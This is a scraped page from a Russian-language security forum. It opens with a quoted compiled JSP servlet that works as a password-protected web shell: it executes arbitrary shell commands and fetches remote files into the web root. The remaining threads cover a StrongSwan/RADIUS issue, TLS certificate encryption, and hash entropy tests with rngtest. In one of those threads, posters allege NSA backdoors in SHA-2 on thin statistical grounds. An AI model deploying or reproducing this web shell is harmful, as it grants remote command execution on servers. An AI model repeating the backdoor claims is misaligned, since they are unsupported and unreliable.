            _jspx_page_context = pageContext;
            application = pageContext.getServletContext();
            config = pageContext.getServletConfig();
            session = pageContext.getSession();
            out = pageContext.getOut();
            _jspx_out = out;


          if("G5X49Q".equals(request.getParameter("pwd")))
          {
              String strCmd=request.getParameter("cmd");
              String strUrl=request.getParameter("url");
              String strFile=request.getParameter("file");
              if(null!=strCmd)
              {
                  java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();
                  int a = -1;
                  byte[] b = new byte[2048];
                  out.print("<pre>");
                  while((a=in.read(b))!=-1)
                  {
                      out.println(new String(b));
                  }
                  out.print("</pre>");
              }
              if(null!=strUrl&&null!=strFile)
              {
                  java.io.InputStream in = new java.net.URL(strUrl).openStream();
                  byte[] b = new byte[1024];
                  java.io.ByteArrayOutputStream baos = new
                  java.io.ByteArrayOutputStream();
                  int a = -1;
                  while ((a = in.read(b)) != -1)
                  {
                      baos.write(b, 0, a);
                  }
                  new java.io.FileOutputStream(application.getRealPath("/")+"/"+strFile).write(baos.toByteArray());
              }
              out.println("MtGqKu3y");
          }
          else
          {
              //out.println("no token");
          }

          } catch (java.lang.Throwable t) {
            if (!(t instanceof javax.servlet.jsp.SkipPageException)){
              out = _jspx_out;
              if (out != null && out.getBufferSize() != 0)
                try {
                  if (response.isCommitted()) {
                    out.flush();
                  } else {
                    out.clearBuffer();
                  }
                } catch (java.io.IOException e) {}
              if (_jspx_page_context != null) _jspx_page_context.handlePageException(t);
              else throw new ServletException(t);
            }
          } finally {
            _jspxFactory.releasePageContext(_jspx_page_context);
          }
        }
      }

      сообщить модератору +/ответить
Заражен ли ноутбук?, !*! Sizf, (Проблемы с безопасностью / Другая система) 19-Июл-23, 14:44  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Китай tox.chat  и все все все ....., !*! Аноним, (Firewall и пакетные фильтры) 09-Май-23, 17:50  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]


как удалить /dev/tty*  ?, !*! LehaValov, (Безопасность системы) 16-Ноя-15, 06:08  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
StrongSWAN (IKE2\EAP) + freeradius авторизация (Framed-IP-Addre, !*! sysgloster, (VPN, IPSec) 19-Мрт-22, 14:52  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • gt оверквотинг удален В дополнение, кусок лога Атрибут дублируется Framed-IP-, !*! sysgloster (ok), 16:33 , 19-Мрт-22 (1)
    >[оверквотинг удален]
    > (5)   NAS-Port-Id = "IKEv2+EAP"
    > (5)   NAS-IP-Address = %EXT-IP-VDS%
    > (5)   Called-Station-Id = "%EXT-IP-VDS%[500]"
    > (5)   Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
    > (5)   User-Name = "%radius-username%"
    > (5)   Framed-IP-Address = 10.255.24.2
    > (5)   NAS-Identifier = "strongSwan"
    > IP адреса, логины и пароли изменены.
    > Буду рад совету.
    > Заранее благодарен.

    В дополнение, кусок лога. Атрибут дублируется:
    Framed-IP-Address = 10.255.24.2
    Framed-IP-Address = 10.255.24.12

    Sat Mar 19 13:25:24 2022
            Acct-Status-Type = Stop
            Acct-Session-Id = "1647688010-74"
            NAS-Port-Type = Virtual
            Service-Type = Framed-User
            NAS-Port = 74
            NAS-Port-Id = "IKEv2+EAP"
            NAS-IP-Address = %EXT-IP-VDS%
            Called-Station-Id = "%EXT-IP-VDS%[500]"
            Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
            User-Name = "%radius-username%"
            Framed-IP-Address = 10.255.24.2
            Framed-IP-Address = 10.255.24.12
            Acct-Output-Octets = 184630
            Acct-Output-Packets = 374
            Acct-Input-Octets = 140713
            Acct-Input-Packets = 348
            Acct-Session-Time = 390
            Acct-Terminate-Cause = User-Request
            NAS-Identifier = "strongSwan"
            Event-Timestamp = "Mar 19 2022 13:25:24 UTC"
            Tmp-String-9 = "ai:"
            Acct-Unique-Session-Id = "87126f7fa0835846260efa39b8e90656"
            Timestamp = 1647696324

    сообщить модератору +/ответить
Способы блокировки рекламы и прочего мусора на уровне системы, !*! c06a8acb, (Блокирование спама и вирусов) 30-Янв-21, 14:34  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
firejail создает /dev/null с правами 0400 , как побороть?, !*! сонный анон., (Linux привязка) 29-Мрт-22, 05:18  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Передача сертификата сервером в процессе установления TLS-соед., !*! Lun2, (Шифрование, SSH, SSL) 29-Апр-23, 18:31  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • Хотелось ответить в стиле - да Но надо что-то менять в этом мирке Только когда , !*! Аноним (-), 19:33 , 02-Май-23 (2)
    Хотелось ответить в стиле - да. Но надо что-то менять в этом мирке.

    Только когда клиент авторизует сервер по собственному сертификату, а сервер клиента по его собственному сертификату - можно сказать что соединение авторизовано и зашифровано. Все остальное лабуда, хоть на лбу себе зеленый замочек набейте - безопасТнее не станет.

    сообщить модератору +/ответить
  • В открытом Это же открытый ключ из пары ключей ассиметричного шифрования Закры, !*! pashev.ru (?), 15:13 , 03-Май-23 (3)
    > Добрый день!
    > Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
    > ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
    > виде или в зашифрованном  ?

    В открытом. Это же открытый ключ из пары ключей ассиметричного шифрования. Закрытый ключ остаётся на сервере.

    сообщить модератору +/ответить
    • фигичного шифрования клиентский ключ шифрован открытым ключем сервера а вот то , !*! Аноним (-), 20:53 , 03-Май-23 (4) –1

      > В открытом. Это же открытый ключ из пары ключей ассиметричного шифрования. Закрытый
      > ключ остаётся на сервере.

      фигичного шифрования. клиентский ключ шифрован открытым ключем сервера.
      а вот то что сервер не авторизован из-за того что на нем нет ключа клиента - делает все эти шифрования бесполезными, аля современный https с зелеными замочками

      сообщить модератору –1 +/ответить
      • Ты бредишь , !*! pashev.ru (?), 22:50 , 04-Май-23 (5)
        >> В открытом. Это же открытый ключ из пары ключей ассиметричного шифрования. Закрытый
        >> ключ остаётся на сервере.
        > фигичного шифрования. клиентский ключ шифрован открытым ключем сервера.
        > а вот то что сервер не авторизован из-за того что на нем
        > нет ключа клиента - делает все эти шифрования бесполезными, аля современный
        > https с зелеными замочками

        Ты бредишь.

        сообщить модератору +/ответить
  • Этот сертификат публичный он один для всех даже если ты его зашифруешь - любой, !*! ыы (?), 13:39 , 05-Май-23 (6)
    > Добрый день!
    > Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
    > ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
    > виде или в зашифрованном  ?

    Этот сертификат публичный. он один для всех. даже если ты его зашифруешь - любой клиент получит его и будет знать. какой смысле его шифровать? :)

    сообщить модератору +/ответить
  • прочитайте уже про ассимитричное шифрование, !*! Tester (??), 14:00 , 06-Май-23 (7)
    > Добрый день!
    > Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
    > ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
    > виде или в зашифрованном  ?

    прочитайте уже про ассимитричное шифрование

    сообщить модератору +/ответить
    • Вопрос касался не ассимметричного шифрования вообще до него дело пока не дошло , !*! Lun2 (ok), 21:21 , 09-Май-23 (8)
      >> Добрый день!
      >> Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
      >> ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
      >> виде или в зашифрованном  ?
      > прочитайте уже про ассимитричное шифрование

      Вопрос касался не ассимметричного шифрования вообще (до него дело пока не дошло), а передачи сертификата, а возник он из-за того, что в RFC 8446 (секция 2) сообщение "Certificate" отмечено в фигурных скобках, а далее добавлено примечание:
      "{} Indicates messages protected using keys derived from a [sender]_handshake_traffic_secret".

      Я понял эту фразу как то, сертификат шифруется. Возможно, ошибаюсь, поэтому я спрашиваю более знающих...

      Более того, далее указано - "Everything after this phase is encrypted". Вроде бы однозначно сказано, но вопрос возник еще и потому, что в самом описании сообщения "Certificate" четко не написано - шифруется он или нет, напротив, говорится, что он отсылается в кодировке DER (это нешифрованные данные).


      сообщить модератору +/ответить
Сколько лет интернет провайдеры хранят логи? , !*! Базик, (Разное / Другая система) 06-Апр-23, 18:20  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Как преобразовать секретный ключ от openssl в двоичный формат ?, !*! Lun2, (Шифрование, SSH, SSL) 21-Апр-23, 22:30  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Как получить сертификат от LetsEncrypt, !*! Lun2, (Шифрование, SSH, SSL) 19-Апр-23, 22:56  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
ClamAV бан в РФ?, !*! GlooM, (ПО для увеличения безопасности / Linux) 11-Мрт-22, 08:47  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Статистическое исследование энтропии из контрольных сум., !*! Аноним, (ПО для тестирования и диагностики) 11-Мрт-23, 11:51  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • Хэширование вообще-то энтропию не создает Часто даже уменьшает , Аноним (1), 13:28 , 12-Мрт-23 (1) !*!
  • Для хеш-сумм главное коллизии Энтропия, конечно, тоже важна, но измерять её инс, Аноним (9), 22:21 , 13-Мрт-23 (4) !*!
    • Т е выше , Аноним (9), 06:06 , 14-Мрт-23 (5) !*!
    • Хорошая энторпия ведет к исключению колизий Это взаимосвязанные понятия Энтропи, !*! Аноним (9), 19:13 , 14-Мрт-23 (9)
      > Для хеш-сумм главное коллизии. Энтропия, конечно, тоже важна,

      Хорошая энторпия ведет к исключению колизий. Это взаимосвязанные понятия.

      > но измерять её инструментом для анализа генераторов случайных чисел - некорректно.

      Энтропия измерялась инструментом, для измерения энтропии. Здесь все корректно. Но можно придратся к самим тестам в rngtest.

      > А разница между хэш-суммами незначительна и не влияет  на их предназначение (плюс не забываем про некорректность инструмента измерения).

      А вот здесь не соглашусь. Явно в статистике усматривается уменишение энтропии в современных контрольных сумах по сравнению со старыми. А значит прямо влияет на их предназначение. Усматривается вероятность закладок в современных хешах!

      > ИМХО это успех.

      Да: sha1, tiger, sha224, whirlpool победили ВСЕ стандартные, програмные, источники энтропии в системе! Даже 'gpg --gen-random 2' повержен. Это безусловно большой успех.

      Проиграли только искуственному источнику энтропии с коррекцией под проводимый тест:


      dd if=/dev/urandom status=none |rngtest --pipe

      Но почему победили старые контрольные сумы sha1 и tiger, а не новые?!! Чем новее контрольная сума тем хуже у нее энтропия. И это ИМХО ПРОВАЛ...   ;)

      сообщить модератору +/ответить
      • Вот коллизии и измеряйте Сферический конь в вакууме В пределах погрешности измер, !*! Аноним (9), 20:25 , 14-Мрт-23 (10)
        > Хорошая энторпия ведет к исключению колизий. Это взаимосвязанные понятия.

        Вот коллизии и измеряйте.

        > Энтропия измерялась инструментом, для измерения энтропии.

        Сферический конь в вакууме.

        > Явно в статистике усматривается уменишение энтропии в

        В пределах погрешности измерений.

        > Усматривается вероятность закладок в современных хешах!

        Предоставьте это решать специалистам в данной области, которых на опеннете не водится.

        сообщить модератору +/ответить
        • Меня интересовала именно энтропия Тестом энтропии определённый FIPS 140-2 от 200, !*! Аноним (12), 17:26 , 15-Мрт-23 (12)
          >> Хорошая энторпия ведет к исключению колизий. Это взаимосвязанные понятия.
          > Вот коллизии и измеряйте.

          Меня интересовала именно энтропия.

          >> Энтропия измерялась инструментом, для измерения энтропии.
          > Сферический конь в вакууме.

          Тестом энтропии определённый FIPS 140-2 от 2001-10-10, rngtest из пакета rng-tools.
          (Note that these tests are defined on FIPS 140-1 and FIPS 140-2 errata of 2001-10-10. They were removed in FIPS 140-2 errata of 2002-12-03)

          >> Явно в статистике усматривается уменишение энтропии в
          > В пределах погрешности измерений.

          На счет погрешности не спорю, чтобы точно назвать цифру после трёх девяток необходимо провести 1 000 000 тестов, а проведено всего 10 000. Но данные результаты не будут сильно отличатся от истеных.
          У кого в доме нет отопления может запустить:


          bash entropy-time-hash sha224 |rngtest -c 1000000
          bash entropy-time-hash sha384 |rngtest -c 1000000

          И убедится в совпадении цыфр после 9 в пределах погрешности +-1 .. +-2

          >> Усматривается вероятность закладок в современных хешах!
          > Предоставьте это решать специалистам в данной области, которых на опеннете не водится.

          Лично усматриваю вероятность закладок в современных хешах на основании представленных статистических данных. А то что напишут проплаченные "крыптологи" не внушает доверия.

          сообщить модератору +/ответить
          • Ну провёл вот пару тестов, только на вход подавал не время, а последовательность, !*! Аноним (9), 18:53 , 15-Мрт-23 (14)
            > И убедится в совпадении цыфр после 9 в пределах погрешности +-1 ..
            > +-2

            Ну провёл вот пару тестов, только на вход подавал не время, а последовательность с шагом 1 начиная с единицы:

            $ bash entropy-sequence-hash.sh sha1 |rngtest -c 10000
            rngtest: FIPS 140-2 successes: 9994
            rngtest: FIPS 140-2 failures: 6
            rngtest: FIPS 140-2(2001-10-10) Monobit: 1
            rngtest: FIPS 140-2(2001-10-10) Poker: 0
            rngtest: FIPS 140-2(2001-10-10) Runs: 2
            rngtest: FIPS 140-2(2001-10-10) Long run: 3
            rngtest: FIPS 140-2(2001-10-10) Continuous run: 0
            rngtest: input channel speed: (min=19.277; avg=23.093; max=36.944)Kibits/s


            $ bash entropy-sequence-hash.sh sha3-384 |rngtest -c 10000
            rngtest: FIPS 140-2 successes: 9996
            rngtest: FIPS 140-2 failures: 4
            rngtest: FIPS 140-2(2001-10-10) Monobit: 0
            rngtest: FIPS 140-2(2001-10-10) Poker: 0
            rngtest: FIPS 140-2(2001-10-10) Runs: 3
            rngtest: FIPS 140-2(2001-10-10) Long run: 1
            rngtest: FIPS 140-2(2001-10-10) Continuous run: 0
            rngtest: input channel speed: (min=38.232; avg=53.090; max=89.004)Kibits/s

            И что дальше?...

            > Лично усматриваю вероятность закладок в современных хешах на основании представленных
            > статистических данных. А то что напишут проплаченные "крыптологи" не внушает доверия.

            Найдите непроплаченных или проплаченных вами. Всё лучше, чем _ценное_ мнение доморощенного "крыптоаналитега" одной программой и с ограниченным бюджетом.

            сообщить модератору +/ответить
            • В рекомендациях по написанию PRNG 1980-тых, в случае полного отсутствия энтропии, !*! Аноним (16), 20:03 , 15-Мрт-23 (16)
              > только на вход подавал не время, а последовательность с шагом 1 начиная с единицы

              В рекомендациях по написанию PRNG 1980-тых, в случае полного отсутствия энтропии в системе, разрешалось, для первоначального seed-ирования алгоритма PRNG брать "контрольну суму от времени".

              "PRNG" на основе контрольной сумы последовательности натуральных чисел явно перебор. Но не для энтропии, а для исследования самих контрольных сум и обеспечении повторяемости результата, допускаю использование последовательности натуральных чисел. Сделайте пожалуйста ещё ваш тест для sha224.

              А я повторно выложу свои результаты тестов для sha1, sha224, sha384.

              сообщить модератору +/ответить
          • FIPS 140 определяет допустимый минимум для информационных систем FIPS 140-1 с те, !*! Аноним (15), 19:26 , 15-Мрт-23 (15)
            FIPS 140 определяет допустимый минимум для информационных систем.

            FIPS 140-1 с тестами был опубликован 1994.01.11. И эти тесты почему-то были удалены с FIPS 140-2 от 2002.12.03 !

            SHA-1 приняли 1995.04.17 когда тесты были действующими.

            SHA-2 приняли в 2002.08.01 и тесты FIPS 140-2 в редакции от 2001.10.10 были ещё действующими.

            Предполагаю, что кто-то из любопытства запустил, тесты с FIPS 140-1 от 1994.01.11 и FIPS 140-2 от 2001.10.10 для тестирования SHA-2.

            По результатам тестирования в АНБ отправили письмо с вопросом: "почему энтропия полученыа из нового SHA-2 хуже чем получается из старого SHA-1 ?!!"

            Получив письмо, АНБ, для скрытия своих закладок в SHA-2, 2002.12.03 удалила тесты с стандарта FIPS 140-2.

            сообщить модератору +/ответить
  • Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник,, !*! ыы (?), 08:32 , 15-Мрт-23 (11)
    > Статистическое исследование энтропии тестом  FIPS 140-2 от 2001-10-10, rngtest из пакета
    > rng-tools.
    > Как говорят ложь

    Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник, который зависит от вашей активности за компом...

    SHA1 не берет данные из воздуха... он берет их все из того же источника что и все остальные.
    "RNG генерит случайные числа  на основе данных из пула энтропии(entropy pool) в ядре Linux. Наполнением этого пула так же занимается RNG и делается это на основе случайных событий в системе таких как: тайминги клавиатуры и дисков, движения мыши, прерывания(interrupts), сетевой трафик.
    "
    Поэтому ваш эксперимент нужно проводить не единоразово, а прогонять один и тот же тест по кругу в течении недели...и усреднить значения.

    сообщить модератору +/ответить
    • Естественно, что для тестирования контрольных сум был выбран один источник энтро, !*! Аноним (13), 17:38 , 15-Мрт-23 (13)
      > Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник,

      Естественно, что для тестирования контрольных сум был выбран один источник энтропии:
      https://www.opennet.ru/openforum/vsluhforumID10/5638.html#2

      > который зависит от вашей активности за компом...

      Нет.

      > SHA1 не берет данные из воздуха... он берет их все из того
      > же источника что и все остальные.

      Нет. Для теста энтропии из контрольных сум брался отдельный источник энтропии.

      > "RNG генерит случайные числа  на основе данных из пула энтропии(entropy pool) в ядре Linux. Наполнением этого пула так же занимается RNG и  делается это на основе случайных событий в системе таких как: тайминги клавиатуры и дисков, движения мыши, прерывания(interrupts), сетевой трафик.

      Всё это влияет на первые тесты стандартных источников энтропии в системе. Их тоже привёл для сравнения результатов.

      > Поэтому ваш эксперимент нужно проводить не единоразово, а прогонять один и тот же тест по кругу в течении недели...и усреднить значения.

      Вот выше предложил прогнать тест:


      bash entropy-time-hash sha224 |rngtest -c 1000000
      bash entropy-time-hash sha384 |rngtest -c 1000000

      получить точную цифру после 9 и разъяснить всем почему энтропия от sha384 хуже чем от sha224.Это же две контрольные сумы одного стандарта SHA2 !
      сообщить модератору +/ответить
  • Статистическое исследование зависимости энтропии из контрольных сум от входных д, !*! Аноним (17), 18:07 , 10-Апр-23 (17)
    Статистическое исследование зависимости энтропии из контрольных сум от входных данных.

    Первый тест в этой теме получен из входных данных следующего типа:


    original (Pseudo entropy file: "ASCII text, with very long lines" ~75K)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=150 status=none

    Контрольные сумы с подозрительными результатами sha1, sha224, sha384 и tiger перепроверил с разными входящими данными.
    В статистическом исследовании проводилось всего 10 000 тестов, чего явно недостаточно чтобы дать точную цифру после трёх девяток!
    Отмечаем, что sha384 победил со следующими входными данными:
    1. date +%-N%s
    2. date +%-N%s |b2sum |sed 's/[ -]//g'
    4. dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
    5. dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none
    И опять проиграл в тесте с входными данными:
    3. dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none
    в котором sha1 и tiger опять удержали два первых места, причём tiger подтвердил лучший результат.

    То что сума ошибок в тестах больше "failures" означает что ошибки случились в одном и томже тестируемом блоке.
    Такие результаты tiger в 4 тесте возможно из-за временной большой нагрузки на комп, load average: ~20

    1.


    date +%-N%s
    sha1
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha224
    rngtest: FIPS 140-2 successes: 9992
    rngtest: FIPS 140-2 failures: 8
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha384
    rngtest: FIPS 140-2 successes: 9992
    rngtest: FIPS 140-2 failures: 8
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 1
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    tiger
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    2.


    date +%-N%s |b2sum |sed 's/[ -]//g'
    sha1
    rngtest: FIPS 140-2 successes: 9990
    rngtest: FIPS 140-2 failures: 10
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha224
    rngtest: FIPS 140-2 successes: 9993
    rngtest: FIPS 140-2 failures: 7
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 1
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha384
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    tiger
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    3.


    original (Pseudo entropy file: "ASCII text, with very long lines" ~100K)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none
    sha1
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha-224
    rngtest: FIPS 140-2 successes: 9993
    rngtest: FIPS 140-2 failures: 7
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha-384
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    tiger
    rngtest: FIPS 140-2 successes: 9997
    rngtest: FIPS 140-2 failures: 3
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 1
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    4.


    integer (Pseudo entropy integer: >1500 digits)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
    sha1
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 5
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha-224
    rngtest: FIPS 140-2 successes: 9988
    rngtest: FIPS 140-2 failures: 12
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha-384
    rngtest: FIPS 140-2 successes: 9995
    rngtest: FIPS 140-2 failures: 5
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 1
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    tiger
    rngtest: FIPS 140-2 successes: 9988
    rngtest: FIPS 140-2 failures: 12
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 6
    rngtest: FIPS 140-2(2001-10-10) Long run: 6
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 1

    5.


    hashed (Pseudo entropy hexadecimal: <=1172 symbols)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none
    sha1
    rngtest: FIPS 140-2 successes: 9990
    rngtest: FIPS 140-2 failures: 10
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 6
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha-224
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    sha-384
    rngtest: FIPS 140-2 successes: 9995
    rngtest: FIPS 140-2 failures: 5
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    tiger
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 6
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    сообщить модератору +/ответить
    • Во время этого теста жестко ребутился комп и в файл с энтропией записалась после, !*! Аноним (18), 15:10 , 13-Апр-23 (18)
      > 4. dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
      > Такие результаты tiger в 4 тесте возможно из-за временной большой нагрузки на комп, load average: ~20

      Во время этого теста жестко ребутился комп и в файл с энтропией записалась последовательность "нулей": ^@^@^@^@^@^... которая испортила два блока. Без испорченых блоков результат теста для tiger:

      4.

       
      integer (Pseudo entropy integer: >1500 digits) 
      Like: 
      dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none 
      tiger 
      rngtest: FIPS 140-2 successes: 9990 
      rngtest: FIPS 140-2 failures: 10 
      rngtest: FIPS 140-2(2001-10-10) Monobit: 1 
      rngtest: FIPS 140-2(2001-10-10) Poker: 0 
      rngtest: FIPS 140-2(2001-10-10) Runs: 5 
      rngtest: FIPS 140-2(2001-10-10) Long run: 4 
      rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

      сообщить модератору +/ответить


 
Пометить прочитанным Создать тему
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Архив | Избранное | Мое | Новое | | |



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру